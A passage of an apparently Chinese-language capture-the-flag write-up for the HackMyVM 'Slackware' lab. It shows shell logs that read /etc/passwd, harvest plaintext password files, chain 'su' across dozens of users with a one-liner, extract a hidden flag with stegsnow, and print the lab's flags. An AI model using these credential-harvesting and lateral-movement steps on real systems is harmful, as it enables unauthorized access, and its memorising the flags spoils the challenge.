josemlwdf\/\ndrwxr-x---  2 kaian      zayotic     112 Mar 10 22:15 kaian\/\ndrwxr-x---  2 kerszi     aceomn      112 Mar 10 22:15 kerszi\/\ndrwxr-x---  2 kretinga   patrick     112 Mar 10 22:15 kretinga\/\ndrwxr-x---  2 lanz       tasiyanci   112 Mar 10 22:15 lanz\/\ndrwxr-x---  2 mindsflee  icex64      112 Mar 10 22:15 mindsflee\/\ndrwxr-x---  2 mrmidnight alienum     112 Mar 10 22:15 mrmidnight\/\ndrwxr-x---  2 nls        emvee       112 Mar 10 22:15 nls\/\ndrwxr-x---  2 nolose     noname      112 Mar 10 22:15 nolose\/\ndrwxr-x---  2 noname     nls         112 Mar 10 22:15 noname\/\ndrwx--x--x  3 patrick    users       136 Apr 25 09:43 patrick\/\ndrwxr-x---  2 powerful   annlynn     112 Mar 10 22:15 powerful\/\ndrwxr-x---  2 proxy      powerful    112 Mar 10 22:15 proxy\/\ndrwxr-x---  2 pylon      lanz        112 Mar 10 22:15 pylon\/\ndrwxr-x---  2 rijaba1    infayerts   112 Mar 10 22:15 rijaba1\/\ndrwxr-x---  2 rpj7       b4el7d      136 Mar 11 12:47 rpj7\/\ndrwxr-x---  2 ruycr4ft   sancelisso  112 Mar 10 22:15 ruycr4ft\/\ndrwxr-x---  2 sancelisso nolose      112 Mar 10 22:15 sancelisso\/\ndrwxr-x---  2 skinny     josemlwdf   112 Mar 10 22:15 skinny\/\ndrwxr-x---  2 sml        zenmpi      112 Mar 10 22:15 sml\/\ndrwxr-x---  2 tasiyanci  ruycr4ft    112 Mar 10 22:15 tasiyanci\/\ndrwxr-x---  2 terminal   zacarx007   112 Mar 10 22:15 terminal\/\ndrwxr-x---  2 waidroc    boyras200   112 Mar 10 22:15 waidroc\/\ndrwxr-x---  2 whitecr0wz wwfymn      112 Mar 10 22:15 whitecr0wz\/\ndrwxr-x---  2 wwfymn     pylon       112 Mar 10 22:15 wwfymn\/\ndrwxr-x---  2 x4v1l0k    proxy       112 Mar 10 22:15 x4v1l0k\/\ndrwxr-x---  2 zacarx007  mindsflee   112 Mar 10 22:15 zacarx007\/\ndrwxr-x---  2 zayotic    avijneyam   112 Mar 10 22:15 zayotic\/\ndrwxr-x---  2 zenmpi     terminal    112 Mar 10 22:15 zenmpi\/\ndrwxr-x---  2 ziyos      waidroc     112 Mar 10 22:15 ziyos\/\n(remote) patrick@slackware.slackware.local:\/home$ cat \/etc\/passwd\nroot:x:0:0::\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/bin\/false\ndaemon:x:2:2:daemon:\/sbin:\/bin\/false\nadm:x:3:4:adm:\/var\/log:\/bin\/false\nlp:x:4:7:lp:\/var\/spool\/lpd:\/bin\/false\nsync:x:5:0:sync:\/sbin:\/bin\/sync\nshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt\nmail:x:8:12:mail:\/:\/bin\/false\nnews:x:9:13:news:\/usr\/lib\/news:\/bin\/false\nuucp:x:10:14:uucp:\/var\/spool\/uucppublic:\/bin\/false\noperator:x:11:0:operator:\/root:\/bin\/bash\ngames:x:12:100:games:\/usr\/games:\/bin\/false\nftp:x:14:50::\/home\/ftp:\/bin\/false\nsmmsp:x:25:25:smmsp:\/var\/spool\/clientmqueue:\/bin\/false\nmysql:x:27:27:MySQL:\/var\/lib\/mysql:\/bin\/false\nrpc:x:32:32:RPC portmap user:\/:\/bin\/false\nsshd:x:33:33:sshd:\/:\/bin\/false\ngdm:x:42:42:GDM:\/var\/lib\/gdm:\/sbin\/nologin\nntp:x:44:44:User for NTP:\/:\/bin\/false\nicecc:x:49:49:User for Icecream distributed compiler:\/var\/cache\/icecream:\/bin\/false\noprofile:x:51:51:oprofile:\/:\/bin\/false\nusbmux:x:52:83:User for usbmux daemon:\/var\/empty:\/bin\/false\nnamed:x:53:53:User for BIND:\/var\/named:\/bin\/false\nsddm:x:64:64:User for SDDM:\/var\/lib\/sddm:\/bin\/false\npulse:x:65:65:User for PulseAudio:\/var\/run\/pulse:\/bin\/false\ndhcpcd:x:68:68:User for dhcpcd:\/var\/lib\/dhcpcd:\/bin\/false\napache:x:80:80:User for Apache:\/srv\/httpd:\/bin\/false\nmessagebus:x:81:81:User for D-BUS:\/var\/run\/dbus:\/bin\/false\nhaldaemon:x:82:82:User for HAL:\/var\/run\/hald:\/bin\/false\npolkitd:x:87:87:PolicyKit daemon owner:\/var\/lib\/polkit:\/bin\/false\npop:x:90:90:POP:\/:\/bin\/false\npostfix:x:91:91:User for Postfix MTA:\/dev\/null:\/bin\/false\ndovecot:x:94:94:User for Dovecot processes:\/dev\/null:\/bin\/false\ndovenull:x:95:95:User for Dovecot login processing:\/dev\/null:\/bin\/false\nnobody:x:99:99:nobody:\/:\/bin\/false\nldap:x:330:330:OpenLDAP server:\/var\/lib\/openldap:\/bin\/false\npatrick:x:1000:1000::\/home\/patrick:\/bin\/bash\nkretinga:x:1001:1001::\/home\/kretinga:\/bin\/bash\nclaor:x:1002:1002::\/home\/claor:\/bin\/bash\nalienum:x:1003:1003::\/home\/alienum:\/bin\/bash\nmrmidnight:x:1004:1004::\/home\/mrmidnight:\/bin\/bash\nannlynn:x:1005:1005::\/home\/annlynn:\/bin\/bash\npowerful:x:1006:1006::\/home\/powerful:\/bin\/bash\nproxy:x:1007:1007::\/home\/proxy:\/bin\/bash\nx4v1l0k:x:1008:1008::\/home\/x4v1l0k:\/bin\/bash\nicex64:x:1009:1009::\/home\/icex64:\/bin\/bash\nmindsflee:x:1010:1010::\/home\/mindsflee:\/bin\/bash\nzacarx007:x:1011:1011::\/home\/zacarx007:\/bin\/bash\nterminal:x:1012:1012::\/home\/terminal:\/bin\/bash\nzenmpi:x:1013:1013::\/home\/zenmpi:\/bin\/bash\nsml:x:1014:1014::\/home\/sml:\/bin\/bash\nemvee:x:1015:1015::\/home\/emvee:\/bin\/bash\nnls:x:1016:1016::\/home\/nls:\/bin\/bash\nnoname:x:1017:1017::\/home\/noname:\/bin\/bash\nnolose:x:1018:1018::\/home\/nolose:\/bin\/bash\nsancelisso:x:1019:1019::\/home\/sancelisso:\/bin\/bash\nruycr4ft:x:1020:1020::\/home\/ruycr4ft:\/bin\/bash\ntasiyanci:x:1021:1021::\/home\/tasiyanci:\/bin\/bash\nlanz:x:1022:1022::\/home\/lanz:\/bin\/bash\npylon:x:1023:1023::\/home\/pylon:\/bin\/bash\nwwfymn:x:1024:1024::\/home\/wwfymn:\/bin\/bash\nwhitecr0wz:x:1025:1025::\/home\/whitecr0wz:\/bin\/bash\nbit:x:1026:1026::\/home\/bit:\/bin\/bash\ninfayerts:x:1027:1027::\/home\/infayerts:\/bin\/bash\nrijaba1:x:1028:1028::\/home\/rijaba1:\/bin\/bash\ncromiphi:x:1029:1029::\/home\/cromiphi:\/bin\/bash\ngatogamer:x:1030:1030::\/home\/gatogamer:\/bin\/bash\nch4rm:x:1031:1031::\/home\/ch4rm:\/bin\/bash\naceomn:x:1032:1032::\/home\/aceomn:\/bin\/bash\nkerszi:x:1033:1033::\/home\/kerszi:\/bin\/bash\nd3b0o:x:1034:1034::\/home\/d3b0o:\/bin\/bash\navijneyam:x:1035:1035::\/home\/avijneyam:\/bin\/bash\nzayotic:x:1036:1036::\/home\/zayotic:\/bin\/bash\nkaian:x:1037:1037::\/home\/kaian:\/bin\/bash\nc4rta:x:1038:1038::\/home\/c4rta:\/bin\/bash\nboyras200:x:1039:1039::\/home\/boyras200:\/bin\/bash\nwaidroc:x:1040:1040::\/home\/waidroc:\/bin\/bash\nziyos:x:1041:1041::\/home\/ziyos:\/bin\/bash\nb4el7d:x:1042:1042::\/home\/b4el7d:\/bin\/bash\nrpj7:x:1043:1043::\/home\/rpj7:\/bin\/bash\nh1dr0:x:1044:1044::\/home\/h1dr0:\/bin\/bash\ncatch_me75:x:1045:1045::\/home\/catch_me75:\/bin\/bash\njosemlwdf:x:1046:1046::\/home\/josemlwdf:\/bin\/bash\nskinny:x:1047:1047::\/home\/skinny:\/bin\/bash\n0xeex75:x:1048:1048::\/home\/0xeex75:\/bin\/bash\n0xh3rshel:x:1049:1049::\/home\/0xh3rshel:\/bin\/bash\n0xjin:x:1050:1050::\/home\/0xjin:\/bin\/bash\n(remote) patrick@slackware.slackware.local:\/home$ cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied\n(remote) patrick@slackware.slackware.local:\/home$ cd patrick\/\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ ls -la\ntotal 9\ndrwx--x--x  3 patrick users    136 Apr 25 09:43 .\/\ndrwxr-xr-x 54 root    root    1400 Mar 10 22:16 ..\/\n-rw-------  1 patrick patrick    5 Apr 25 09:43 .bash_history\ndrwx------  2 patrick patrick   48 Apr 25 09:45 .cache\/\n-rw-r--r--  1 patrick users   3729 Feb  2  2022 .screenrc\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cd .bash_history \n-bash: cd: .bash_history: Not a directory\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cat .bash_history \nexit\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cd .cache\/\n(remote) patrick@slackware.slackware.local:\/home\/patrick\/.cache$ ls -la\ntotal 0\ndrwx------ 2 patrick patrick  48 Apr 25 09:45 .\/\ndrwx--x--x 3 patrick users   136 Apr 25 09:43 ..\/<\/code><\/pre>\n
\u5207\u6362\u7528\u6237<\/h3>\n
(remote) patrick@slackware.slackware.local:\/home$ cat \/home\/claor\/mypass.txt\nJRksNe5rWgis\n(remote) patrick@slackware.slackware.local:\/home$ cat \/home\/kretinga\/mypass.txt\nlpV8UG0GxKuw\n(remote) patrick@slackware.slackware.local:\/home$ find .\/ -name *pass* -type f 2>\/dev\/null\n.\/claor\/mypass.txt\n.\/kretinga\/mypass.txt\n(remote) patrick@slackware.slackware.local:\/home$ su claor\nPassword: \n(remote) claor@slackware.slackware.local:\/home$ find .\/ -name *pass* -type f 2>\/dev\/null\n.\/claor\/mypass.txt\n.\/mrmidnight\/mypass.txt\n.\/alienum\/mypass.txt\n\n(remote) claor@slackware.slackware.local:\/home$ find .\/ -name '*pass*' -type f 2>\/dev\/null | xargs cat\nJRksNe5rWgis\nB4ReHPEhmlPt\nex0XVRAAjCWX\n(remote) claor@slackware.slackware.local:\/home$ su mrmidnight\nPassword: \n(remote) mrmidnight@slackware.slackware.local:\/home$ find .\/ -name *pass* -type f 2>\/dev\/null\n.\/powerful\/mypass.txt\n.\/mrmidnight\/mypass.txt\n.\/annlynn\/mypass.txt\n(remote) mrmidnight@slackware.slackware.local:\/home$ find .\/ -name '*pass*' -type f 2>\/dev\/null | xargs cat\npof2XIpVzYl3\nB4ReHPEhmlPt\nS64IamSERUI3\n(remote) mrmidnight@slackware.slackware.local:\/home$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\nFor security reasons, the password you type will not be visible.\n\nPassword: \nSorry, user mrmidnight may not run sudo on slackware.<\/code><\/pre>\n
\u592a\u591a\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code><\/p>\n
\"image-20240425180707479\"<\/div>
\n
\"image-20240425180718659\"<\/div>
\n
\"image-20240425180732585\"<\/div><\/p>\n
\/etc\/ImageMagick-7\/mime.xml<\/code><\/pre>\n
\"image-20240425180835639\"<\/div>
\n
\"image-20240425180927987\"<\/div>
\n
\"image-20240425181149249\"<\/div><\/p>\n
\u7fa4\u91cc\u7684\u5e08\u5085\u5957\u5a03\u5957\u51fa\u6765\u4e86\uff01<\/p>\n
\"image-20240425181319562\"<\/div><\/p>\n
(remote) rpj7@slackware.slackware.local:\/home\/rpj7$ ls -la\ntotal 13\ndrwxr-x---  2 rpj7 b4el7d  136 Mar 11 12:47 .\ndrwxr-xr-x 54 root root   1400 Mar 10 22:16 ..\n-rw-r--r--  1 rpj7 rpj7   3729 Feb  2  2022 .screenrc\n-rw-r-----  1 rpj7 b4el7d   13 Mar 10 22:15 mypass.txt\n-rw-r--r--  1 rpj7 b4el7d  314 Mar 11 13:29 user.txt\n(remote) rpj7@slackware.slackware.local:\/home\/rpj7$ cat user.txt \nHMV{Th1s1s1Us3rFlag}                                                           \n(remote) rpj7@slackware.slackware.local:\/home\/rpj7$ <\/code><\/pre>\n
\u90fd\u6ca1\u6709\u6536\u83b7\uff0c\u540e\u6765\u7fa4\u4e3b\u53d1\u73b0\u548cuser.txt<\/code>\u6709\u5173\u7cfb\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ cat user.txt \nHMV{Th1s1s1Us3rFlag}                                                          \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ file user.txt \nuser.txt: ASCII text\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ stegsnow -C user.txt \nTo_Jest_Bardzo_Trudne_Haslo<\/code><\/pre>\n
\u662f\u4e00\u4e2a\u9690\u5199\u3002\u3002\u3002\u3002\u3002<\/p>\n
(remote) root@slackware.slackware.local:\/root# ls -la\ntotal 5\ndrwx--x---  6 root root 232 Mar 11 13:38 .\ndrwxr-xr-x 23 root root 536 Mar 10 16:29 ..\nlrwxrwxrwx  1 root root   9 Mar 10 18:42 .bash_history -> \/dev\/null\ndrwx------  3 root root  72 Mar 11 15:14 .cache\ndrwx------  3 root root  72 Feb 16 22:12 .config\ndrwx------  2 root root 136 Feb 16 22:13 .gnupg\nlrwxrwxrwx  1 root root   9 Mar 11 12:44 .lesshst -> \/dev\/null\ndrwx------  3 root root  72 Feb 16 22:12 .local\n-r--------  1 root root  72 Mar 11 13:38 roo00oot.txt\n(remote) root@slackware.slackware.local:\/root# cat roo00oot.txt \nThere is no root flag here, but it is somewhere in the \/home directory.\n(remote) root@slackware.slackware.local:\/root# cd \/home\n(remote) root@slackware.slackware.local:\/home# find .\/ -name roo00oot.txt -type f 2>\/dev\/null\n(remote) root@slackware.slackware.local:\/home# ls\n0xeex75    boyras200   gatogamer  mindsflee   rijaba1     whitecr0wz\n0xh3rshel  c4rta       h1dr0      mrmidnight  rpj7        wwfymn\n0xjin      catch_me75  icex64     nls         ruycr4ft    x4v1l0k\naceomn     ch4rm       infayerts  nolose      sancelisso  zacarx007\nalienum    claor       josemlwdf  noname      skinny      zayotic\nannlynn    cromiphi    kaian      patrick     sml         zenmpi\navijneyam  d3b0o       kerszi     powerful    tasiyanci   ziyos\nb4el7d     emvee       kretinga   proxy       terminal\nbit        ftp         lanz       pylon       waidroc\n(remote) root@slackware.slackware.local:\/home# cd 0xeex75\/\n(remote) root@slackware.slackware.local:\/home\/0xeex75# ls -la\ntotal 5\ndrwxr-x---  2 0xeex75 0xeex75   80 Mar 10 22:15 .\ndrwxr-xr-x 54 root    root    1400 Mar 10 22:16 ..\n-rw-r--r--  1 0xeex75 0xeex75 3729 Feb  2  2022 .screenrc\n(remote) root@slackware.slackware.local:\/home\/0xeex75# find .\/ -name *oo*.txt -type f 2>\/dev\/null\n(remote) root@slackware.slackware.local:\/home\/0xeex75# find .\/ -name *oo -type f 2>\/dev\/null\n(remote) root@slackware.slackware.local:\/home\/0xeex75# cd ..\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *oo*.txt -type f 2>\/dev\/null\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *oo -type f 2>\/dev\/null\n(remote) root@slackware.slackware.local:\/home# cd kerszi\/\n(remote) root@slackware.slackware.local:\/home\/kerszi# ls -la\ntotal 9\ndrwxr-x---  2 kerszi aceomn  112 Mar 10 22:15 .\ndrwxr-xr-x 54 root   root   1400 Mar 10 22:16 ..\n-rw-r--r--  1 kerszi kerszi 3729 Feb  2  2022 .screenrc\n-rw-r-----  1 kerszi aceomn   13 Mar 10 22:15 mypass.txt\n(remote) root@slackware.slackware.local:\/home\/kerszi# cd ..\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *.txt -type f 2>\/dev\/null\n.\/bit\/mypass.txt\n.\/nls\/mypass.txt\n.\/sml\/mypass.txt\n.\/lanz\/mypass.txt\n.\/rpj7\/mypass.txt\n.\/rpj7\/user.txt\n.\/sancelisso\/mypass.txt\n.\/c4rta\/mypass.txt\n.\/d3b0o\/mypass.txt\n.\/gatogamer\/mypass.txt\n.\/ch4rm\/mypass.txt\n.\/h1dr0\/mypass.txt\n.\/claor\/mypass.txt\n.\/emvee\/mypass.txt\n.\/kaian\/mypass.txt\n.\/rijaba1\/mypass.txt\n.\/proxy\/mypass.txt\n.\/pylon\/mypass.txt\n.\/ziyos\/mypass.txt\n.\/zayotic\/mypass.txt\n.\/mindsflee\/mypass.txt\n.\/x4v1l0k\/mypass.txt\n.\/terminal\/mypass.txt\n.\/b4el7d\/mypass.txt\n.\/zacarx007\/mypass.txt\n.\/boyras200\/mypass.txt\n.\/tasiyanci\/mypass.txt\n.\/aceomn\/mypass.txt\n.\/powerful\/mypass.txt\n.\/mrmidnight\/mypass.txt\n.\/whitecr0wz\/mypass.txt\n.\/icex64\/mypass.txt\n.\/kerszi\/mypass.txt\n.\/ruycr4ft\/mypass.txt\n.\/kretinga\/mypass.txt\n.\/nolose\/mypass.txt\n.\/noname\/mypass.txt\n.\/skinny\/mypass.txt\n.\/catch_me75\/mypass.txt\n.\/avijneyam\/mypass.txt\n.\/alienum\/mypass.txt\n.\/wwfymn\/mypass.txt\n.\/annlynn\/mypass.txt\n.\/zenmpi\/mypass.txt\n.\/waidroc\/mypass.txt\n.\/infayerts\/mypass.txt\n.\/josemlwdf\/mypass.txt\n.\/cromiphi\/mypass.txt\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *.txt -type f 2>\/dev\/null | xargs cat\nfDZRz4SJOs8z\nVfS9EIU5C9xw\nAQewY20VryO7\nIBrVGveXM3jI\nwP26CtkDby6J\nHMV{Th1s1s1Us3rFlag}                                                          \n\noAGSK1zXcbT8\nIAuaOSSTZHoh\noHjylQ7402Dd\nyjwGMry82S2Y\nHz35MslshyXj\ntnvAny2zwYTV\nJRksNe5rWgis\nsj5mu74Nmowb\nR23AJFVTQYaB\neaqz8vJ2pRmU\nGX2xnNNU2Hcc\n6Mqoo8Pud4Fx\n8eS8I1JGxeeZ\nbgg9TT9otdD6\nVZFoxk0lqnnc\nTB7pVPwPUeIW\nQv0dtvZdfpvN\nllMttpVCiYPw\n8LCa5IDAELR4\noW19TzLywNIq\nJO8dvF60MdXR\nsXdnu8wF1Yb8\npof2XIpVzYl3\nB4ReHPEhmlPt\n51BwJ9iYO4E7\ntX5o7AUg2PTd\nrjDwcHDFYBML\nG5UJEpW78pOV\nlpV8UG0GxKuw\nKcHXtRsiUPpw\n0Vsok2PoVo7t\niJ7EnTBCtUS8\nVkyo6rKvXsIw\nvRdS8PLTnTlW\nex0XVRAAjCWX\nVBebiyG62uIg\nS64IamSERUI3\nWiEbQP6K4Sg9\n0aApTUf5E2Eq\nNYURcD5V8k4X\njLzXNEEFdtLX\nCQBpV2NQ3U6A\n(remote) root@slackware.slackware.local:\/home# find .|xargs grep -ri "hmv" \n.\/rpj7\/user.txt:HMV{Th1s1s1Us3rFlag}                                                           \n.\/0xh3rshel\/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}\n.\/rpj7\/user.txt:HMV{Th1s1s1Us3rFlag}                                                           \n.\/rpj7\/user.txt:HMV{Th1s1s1Us3rFlag}                                                           \ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent.ssh: No such device or address\ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent.extra: No such device or address\ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent: No such device or address\ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent.browser: No such device or address.\/0xh3rshel\/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}\n.\/0xh3rshel\/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}<\/code><\/pre>\n
\u3002\u3002\u3002\u3002\u3002\u6c57\u6d41\u6d43\u80cc\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u989d\u5916\u6536\u83b7<\/h2>\n
\u7fa4\u4e3b<\/a>\u7684\u6570\u636e\u5904\u7406\u65b9\u6cd5\uff1a<\/p>\n
\"image-20240426130104342\"<\/div><\/p>\n
\u5b9e\u8df5\u4e00\u4e0b\uff1a<\/p>\n
patrick@slackware:~$ id\nuid=1000(patrick) gid=1000(patrick) groups=1000(patrick),1001(kretinga)\npatrick@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}')\npatrick@slackware:~$ echo $user\nkretinga\npatrick@slackware:~$ pass=$(cat ..\/$user\/mypass.txt)\npatrick@slackware:~$ echo $pass\nlpV8UG0GxKuw\npatrick@slackware:~$ grep -Pnir 'hmv' \/home 2>\/dev\/null\npatrick@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nlpV8UG0GxKuw\nPassword: \nkretinga@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nJRksNe5rWgis\nPassword: \nclaor@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nex0XVRAAjCWX\nPassword: \nalienum@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nB4ReHPEhmlPt\nPassword: \nmrmidnight@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nS64IamSERUI3\nPassword: \nannlynn@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\npof2XIpVzYl3\nPassword: \npowerful@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nGX2xnNNU2Hcc\nPassword: \nproxy@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nTB7pVPwPUeIW\nPassword: \nx4v1l0k@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\ntX5o7AUg2PTd\nPassword: \nicex64@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nVZFoxk0lqnnc\nPassword: \nmindsflee@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n8LCa5IDAELR4\nPassword: \nzacarx007@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nQv0dtvZdfpvN\nPassword: \nterminal@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nWiEbQP6K4Sg9\nPassword: \nzenmpi@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nAQewY20VryO7\nPassword: \nsml@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nsj5mu74Nmowb\nPassword: \nemvee@slackware:~$  user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nVfS9EIU5C9xw\nPassword: \nnls@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n0Vsok2PoVo7t\nPassword: \nnoname@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nKcHXtRsiUPpw\nPassword: \nnolose@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\noAGSK1zXcbT8\nPassword: \nsancelisso@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nG5UJEpW78pOV\nPassword: \nruycr4ft@slackware:~$  user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nJO8dvF60MdXR\nPassword: \ntasiyanci@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nIBrVGveXM3jI\nPassword: \nlanz@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n6Mqoo8Pud4Fx\nPassword: \npylon@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nVBebiyG62uIg\nPassword: \nwwfymn@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n51BwJ9iYO4E7\nPassword: \nwhitecr0wz@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nfDZRz4SJOs8z\nPassword: \nbit@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nNYURcD5V8k4X\nPassword: \ninfayerts@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\neaqz8vJ2pRmU\nPassword: \nrijaba1@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nCQBpV2NQ3U6A\nPassword: \ncromiphi@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nyjwGMry82S2Y\nPassword: \ngatogamer@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nHz35MslshyXj\nPassword: \nch4rm@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nsXdnu8wF1Yb8\nPassword: \naceomn@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nrjDwcHDFYBML\nPassword: \nkerszi@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\noHjylQ7402Dd\nPassword: \nd3b0o@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nvRdS8PLTnTlW\nPassword: \navijneyam@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nbgg9TT9otdD6\nPassword: \nzayotic@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nR23AJFVTQYaB\nPassword: \nkaian@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nIAuaOSSTZHoh\nPassword: \nc4rta@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\noW19TzLywNIq\nPassword: \nboyras200@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n0aApTUf5E2Eq\nPassword: \nwaidroc@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n8eS8I1JGxeeZ\nPassword: \nziyos@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nllMttpVCiYPw\nPassword: \nb4el7d@slackware:~$ user=$(id|awk -F'[()]' '{print $(NF-1)}');pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nwP26CtkDby6J\nPassword: \nrpj7@slackware:~$ grep -Pnir 'hmv' \/home 2>\/dev\/null\n\/home\/rpj7\/.bash_history:7:grep -Pnir 'hmv' \/home\n\/home\/rpj7\/user.txt:1:HMV{Th1s1s1Us3rFlag}<\/code><\/pre>\n
\u6211\u8fd9\u91cc\u662f\u77e5\u9053\u7ed3\u679c\u4e86\uff0c\u5b9e\u9645\u4e0a\u6bcf\u4e00\u6b65\u90fd\u8981\u67e5\u4e00\u4e0b\u3002\u3002\u3002\u3002<\/p>\n
\u811a\u672c\u901f\u901a<\/h3>\n
\u8fd9\u91cc\u5199\u4e86\u4e00\u4e2a\u811a\u672c\uff0c\u53ef\u4ee5\u5feb\u901f\u627e\u5230userflag\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u4f7f\u7528\u4e00\u4e0b\uff1a<\/strong><\/p>\n
